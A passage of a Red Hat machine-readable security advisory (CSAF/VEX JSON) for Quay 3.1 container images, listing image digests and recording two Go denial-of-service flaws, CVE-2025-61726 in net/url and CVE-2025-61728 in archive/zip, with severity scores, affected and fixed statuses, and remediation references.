"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
